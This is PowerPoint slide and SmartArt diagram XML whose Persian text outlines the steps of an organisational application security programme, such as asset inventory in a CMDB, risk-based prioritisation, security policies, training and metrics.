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4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId30"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId31"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="323" r:id="rId5"/>
    <p:sldId id="277" r:id="rId6"/>
    <p:sldId id="318" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="301" r:id="rId10"/>
    <p:sldId id="321" r:id="rId11"/>
    <p:sldId id="304" r:id="rId12"/>
    <p:sldId id="307" r:id="rId13"/>
    <p:sldId id="303" r:id="rId14"/>
    <p:sldId id="309" r:id="rId15"/>
    <p:sldId id="315" r:id="rId16"/>
    <p:sldId id="311" r:id="rId17"/>
    <p:sldId id="308" r:id="rId18"/>
    <p:sldId id="310" r:id="rId19"/>
    <p:sldId id="306" r:id="rId20"/>
    <p:sldId id="268" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="302" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="320" r:id="rId25"/>
    <p:sldId id="281" r:id="rId26"/>
    <p:sldId id="286" r:id="rId27"/>
    <p:sldId id="317" r:id="rId28"/>
    <p:sldId id="322" r:id="rId29"/>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60" autoAdjust="0"/>
    <p:restoredTop sz="95096" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="426" y="132"/>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fa-IR" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>شروع </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just" defTabSz="422275" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>تمام برنامه ها و دارایی های مرتبط مربوطه را مستند کنید. سازمان های بزرگ باید در نظر داشته باشند که پایگاه داده مدیریت پیکربندی (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"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rPr>
            <a:t>CMDB) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t> را برای این منظور در نظر بگیرند.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="10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B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>رویکرد مبتنی بر خطر</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just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>نیازهای حفاظتی نمونه کارها را از منظر تجاری شناسایی کنید. این باید بخشی از قوانین حریم خصوصی و سایر مقررات مربوط به دارایی داده محافظت شود.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>فعالسازی یک بنیاد قوی</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r" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مجموعه ای از سیاست ها و استانداردهای متمرکز را ایجاد کنید که امنیت پایه برنامه را برای همه تیم های توسعه تطبیق دهد.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>ادغام امنیت با پروسه های موجود</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just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>تعریف و ادغام فعالیت های ایمن سازی و تأیید را در فرایندهای توسعه و عملیاتی موجود</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRP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just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>ارائه کارشناسان موضوعی و حمایت از خدمات برای توسعه و تیم پروژه برای موفقیت.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRP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just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مدیریت با معیارهای تصمیم گیری در مورد بهبود و تامین مالی بر اساس معیارها و داده های تجزیه و تحلیل داده شده رانندگی کنید. متریک شامل پیوستگی به شیوه های امنیتی و فعالیت ها، معرفی آسیب پذیری ها، آسیب پذیری ها، پوشش برنامه، چالش های نقص بر اساس نوع و تعداد موارد و غیره است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRP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just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>تجزیه و تحلیل داده ها از فعالیت های پیاده سازی و تایید برای نگاه کردن به علل ریشه و الگوهای آسیب پذیری برای راندن پیشرفت های استراتژیک و سیستماتیک در سراسر شرکت.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>از اشتباهات یاد بگیرند و انگیزه های مثبت برای ارتقای پیشرفت ارائه دهند.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRP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C17C8C25-FB04-4144-9BC4-2AA98FD20C15}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>یک برنامه امنیتی نرم افزاری ایجاد کنید و درایور را بردارید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"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endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{934F0D0A-0534-4C1F-B87F-A777692630FC}" type="parTrans" cxnId="{34EBD5D3-8C5C-4C7E-99AB-97EB9FDE3821}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6637210C-FE8B-4A3B-817E-93C573306F8C}" type="sibTrans" cxnId="{34EBD5D3-8C5C-4C7E-99AB-97EB9FDE3821}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CCD256B-714D-4CF1-B838-882C2ECEC97A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>انجام یک تجزیه و تحلیل شکاف قابلیت مقایسه سازمان خود را به همسالان خود را برای تعریف کلیدی</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"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endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF72B059-C42D-4F7E-BFD1-EEB9A9F077F6}" type="parTrans" cxnId="{46C9AF68-6F9E-4CBD-BA6A-9D011880B69D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6311BE1C-9630-42DA-8BA2-70476EF46993}" type="sibTrans" cxnId="{46C9AF68-6F9E-4CBD-BA6A-9D011880B69D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C80556B-7D43-4F65-B649-59AC4253CE24}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>مناطق بهبودی و یک طرح اجرایی.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"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endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C94B431-CF1B-4AA8-BBF8-B1EAF57B80A8}" type="parTrans" cxnId="{ECB23B71-4CE1-46A6-A504-A7D7B9975CE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5476E44-C7FC-4021-A2BD-826EB9E59B5A}" type="sibTrans" cxnId="{ECB23B71-4CE1-46A6-A504-A7D7B9975CE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED5CD133-6F9F-4947-A134-0AD32930A62D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>به دست آوردن مدیریت تایید و ایجاد یک کمپین آگاهی امنیتی برنامه برای کل سازمان فناوری اطلاعات.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"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endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{055D5AA0-A965-4319-96E0-F718D0A7B1A2}" type="parTrans" cxnId="{16C3DAB8-EAB9-47D7-BF41-72B0AB6F1502}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78074B42-C8F1-48F3-9ABE-E5FDE5DA75F2}" type="sibTrans" cxnId="{16C3DAB8-EAB9-47D7-BF41-72B0AB6F1502}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2268AA8B-F97B-4EC1-85A7-3EA5A2360FDF}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>یک مدل رایج ریسک را با یک مجموعه سازگاری از عوامل احتمال و تاثیر گذار بر تحمل پذیری سازمان برای ریسک ایجاد کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AC97F6D-FFEF-4320-9B61-C29EDFABD681}" type="parTrans" cxnId="{28C42FA2-107F-4B00-B918-892614438198}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39AC3042-625E-43FC-AE8D-E50A542BF414}" type="sibTrans" cxnId="{28C42FA2-107F-4B00-B918-892614438198}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E70AE55-65DA-4A08-9713-4DBDBC4D206F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>بر اساس این همه برنامه ها و </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>API </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> های خود را اندازه گیری و اولویت بندی کنید. نتایج را به</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>CMDB </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> اضافه کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AAEEFEC-0B2B-405D-8E9D-8681C8654E47}" type="parTrans" cxnId="{55E55943-16D9-4BB4-98C3-E598BBC5C229}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBB497BE-1BFE-4117-B417-D27BA1850B32}" type="sibTrans" cxnId="{55E55943-16D9-4BB4-98C3-E598BBC5C229}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64D9E6A0-3812-42C8-8434-32DCF505AAE6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>دستورالعمل های اطمینان را به درستی تعریف پوشش و سطح سختی مورد نیاز ایجاد کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B070B49E-4EF7-4FAC-9495-62AC78A1F012}" type="parTrans" cxnId="{E7DA40D3-122B-437D-A6EC-7D1EDA40ABE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{16A765A2-4DAD-4A3C-96AF-79B6295E2627}" type="sibTrans" cxnId="{E7DA40D3-122B-437D-A6EC-7D1EDA40ABE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42C52315-0953-4F62-A146-67E6F7B01745}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مجموعه ای از کنترل های امنیتی قابل استفاده مجدد را که به این سیاست ها و استانداردها مجهز است و مجموعه ای از دستورالعمل های طراحی و توسعه را در مورد استفاده از آنها تکمیل کنید، تعریف کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D25673F9-0FE4-4220-AC9C-8304C2F13798}" type="parTrans" cxnId="{8BD9752E-5684-44AB-A79B-A1309D1904E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49FA421C-7FA6-45DB-9023-802CE529E262}" type="sibTrans" cxnId="{8BD9752E-5684-44AB-A79B-A1309D1904E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{715E4EE0-48DC-4CD7-A61E-076653D8895C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>ایجاد یک برنامه درسی برنامه های امنیتی کاربردی که مورد نیاز و هدف های مختلف توسعه و موضوعات است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC737E6D-22F1-493E-AECB-C1E0DA191034}" type="parTrans" cxnId="{486D908C-1B5F-4195-ABF2-43708D29D28E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF93B450-66BE-4D5C-8260-6A705965BEB4}" type="sibTrans" cxnId="{486D908C-1B5F-4195-ABF2-43708D29D28E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA778889-59E2-45DA-95C5-34CB3C4E880F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5B88E36-8286-4221-8E7C-A0F004EB702C}" type="parTrans" cxnId="{2C53057E-90A2-42AE-9387-74DE727A3730}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF375FEF-38A6-4AFD-96BF-4941E2177BF8}" type="sibTrans" cxnId="{2C53057E-90A2-42AE-9387-74DE727A3730}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20FB68AB-18A5-428E-BC33-7389C147E760}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="just" rtl="1"/>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>فعالیت ها شامل مدل سازی تهدید، طراحی ایمن و بازبینی طراحی، برنامه نویسی امن و بازبینی کد، آزمایش نفوذ و اصلاح است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
